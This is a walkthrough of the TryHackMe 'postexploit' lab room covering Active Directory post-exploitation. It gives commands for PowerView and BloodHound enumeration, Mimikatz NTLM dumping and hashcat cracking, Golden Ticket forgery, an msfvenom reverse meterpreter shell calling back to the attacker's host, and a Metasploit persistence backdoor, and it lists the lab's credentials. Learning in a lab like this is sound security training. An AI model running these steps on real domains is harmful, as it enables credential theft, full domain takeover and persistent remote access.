POSTEXPLOIT
https://tryhackme.com/room/postexploit
Last updated
https://tryhackme.com/room/postexploit
Last updated
Username: Administrator
Password: P@$$W0rd
Domain Name: CONTROLLER
Use a tool called Powerview, from powershell empire, to enumerate a domain after gaining a shell in the system. The following command will copy the existing powershell script from kali's library:
cp /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/powerview.ps1 .
Next step is to get this script on the box. SSH can be used to login using the given credentials, ssh Administrator@<IP> and shows the following screen:
The command powershell -ep bypass bypasses the execution policy of powershell allowing for the execution of scripts.
The next step is getting PowerView on the box. This can be done a number of ways, one way is using python webserver with wget i.e. python -m http.server and wget http://<myip>/powerview.ps1. You can also use scp or a samba server. For our convenience, the powerview script was already in the Downloads folder. Start PowerView by importing the modules with the following command:
import-module .\Downloads\PowerView.ps1
quick way: . .\Downloads\PowerView.ps1
Next using some of the imported modules, we can enumerate the domain users and domain groups:
get-netuser | select cn
get-netgroup -groupname *admin*
get-netcomputer -fulldata | select operatingsystem
Bloodhound is a graphical interface that allows a person to visually map out the network. It's useful for finding the shortest path to a domain admin or discovering kerberoastable users among many other things.
Install Bloodhound with sudo apt install bloodhound. Must run neo4j with bloodhound to display graphs using the command sudo neo4j console. The next step is putting the powershell or exe file of Sharphound on the target box and running it like we did with the last tool i.e. import-module .\Downloads\SharpHound.ps1.
Start collecting information on the users, groups, trusts, etc. of the network by running the following command:
Invoke-BloodHound -CollectionMethod All -Domain CONTROLLER.local -ZipFilename loot.zip
Since we can ssh onto the Windows box, we can get the file by using scp:
scp Administrator@<targetip>:20220219133203_loot.zip .
Run Bloodhound using the command bloodhound and then use the default credentials neo4j:neo4j.
After logging in, drag and drop the downloaded zip file onto the Bloodhound application. Once fully imported, you can examine a large number of queries to further enumerate the domain network and users. One example is "Find Shortest Paths to Domain Admins":
Mimikatz is a post-exploitation tool mainly used for dumping user credentials inside of an active directory network. NTLM hashes can be cracked using cracking tools like Hashcat or they can be used along with evil-winrm to gain a shell without any other knowledge. Run Mimikatz with .\mimikatz.exe
Follow the steps to do a number of things:
Ensure that Mimikatz is running as administrator: privilege::debug
Dump NTLM hashes for users: lsadump::lsa /patch
Get all password information for users: sekurlsa::logonpasswords full
Sample of lsadump command:
Copy the lsadump and run the command cat lsadump.txt | grep NTLM | cut -d' ' -f3 > hashes.txt to place all the NTLM's in a single file for cracking! Run the following command to crack those passwords:
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt.gz
The results can be matched with the NTLM's for a number of solved credentials.
Creds 1 > Machine1 : Password1
Creds 2 > Machine2 : Password2
Creds 3 > Administrator : P@$$W0rd
Creds 4 > SQLService : MYpassword123#
A Golden Ticket attack uses Kerberos tickets to take over the key distribution service of a legitimate user. This attacks a KRBTGT or Active Directory Key Distribution Service Account to forge "Kerberos Ticket Granting Tickets" (TGTs) to access any resource on an Active Directory Domain.
First, start mimikatz and ensure administrator privilege is running with privilege::debug. Next it's important to get three things to create a Golden Ticket: (1) krbtgt username (2) domain full name (3) krbtgt NTLM. Get this information with the following command:
mimikatz # lsadump::lsa /inject /name:krbtgt
Create the golden ticket using the found information with the following command:
mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
The ticket will be created and saved to ticket.kirbi but can be used from the mimikatz console to open a new command prompt with elevated privileges to all machines: misc::cmd
Server Managers give an easy way for enumeration only using the built in windows features such as the server manager. The first step is creating an rdp connection to access the server:
xfreerdp /u:Administrator /v:<targetip> /dynamic-resoultion +clipboard
After logging in, open the "Server Manager" app by clicking the Windows start menu and typing it in.
Click on the [Tools] tab and then click on "Active Directory Users and Computers". This will put up a list of all users on the domain as well as other information such as groups and computers.
This will go over setting up a meterpreter shell and then using a metasploit module to create a backdoor service in the system that will give an instant shell if the machine is ever shutdown or rest.
First generate a payload with msfvenom. The following command will generate a basic windows meterpreter reverse tcp shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<myip> LPORT=<myport> -f exe -o shell.exe
Then transfer the payload using scp to the target machine:
scp shell.exe Administrator@<targetip>:"C:\Users\Administrator\Downloads\shell.exe"
Use metasploit's "exploit/multi/handler" to create a listener:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <myip>
set LPORT <myport>
run
Execute the generated payload on the target machine using .\shell.exe and the listener should open a meterpreter session:
Once a shell is caught, follow these steps to run the persistence module:
use exploit/windows/local/persistence
set session <id>
run
Now, whenever the session dies, rerunning the multi-handler should always get a shell thanks to the persistence service.
PowerView can be used to enumerate a vast majority of things. An existing cheatsheet can be found [here[() which is a list of commands by HackTricks. Sample commands that can be used:
